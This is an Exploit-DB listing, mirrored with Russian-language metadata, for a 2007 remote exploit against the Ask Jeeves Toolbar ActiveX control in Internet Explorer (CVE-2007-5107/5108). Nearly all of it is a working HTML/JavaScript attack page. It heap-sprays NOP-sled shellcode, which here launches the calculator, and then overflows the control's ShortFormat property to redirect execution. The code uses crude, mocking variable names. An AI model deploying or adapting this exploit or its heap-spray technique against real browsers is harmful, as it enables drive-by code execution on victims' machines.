- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4452
- Проверка EDB
-
- Пройдено
- Автор
- JOEY MENGELE
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-5108 cve-2007-5107
- Дата публикации
- 2007-09-24
HTML:
<html>
<SCRIPT language="javascript">
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times because what else?
// This code currently not work on Solaris/Sparc
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var dick = 0x400000;
var j0hnson = sucks.length * 2;
var spraySlideSize = dick - (j0hnson+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (str0ke - 0x400000)/dick;
memory = new Array();for (i=0;i<heapBlocks;i++)
{memory[i] = spraySlide + sucks;}
try{
gadi = new ActiveXObject( 'AskJeevesToolBar.SettingsPlugin.1' );
}
catch(evron)
{
alert(evron);
}
netdev = "A";
while (netdev.length != 0x5e0)
netdev += "A";
netdev += unescape("%0d%0d%0d%0d");
gadi.ShortFormat = netdev;
function getSpraySlide(spraySlide, spraySlideSize)
{while (spraySlide.length*2<spraySlideSize){
spraySlide += spraySlide;}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;}
</script>
</html>
# milw0rm.com [2007-09-24]- Источник
- www.exploit-db.com
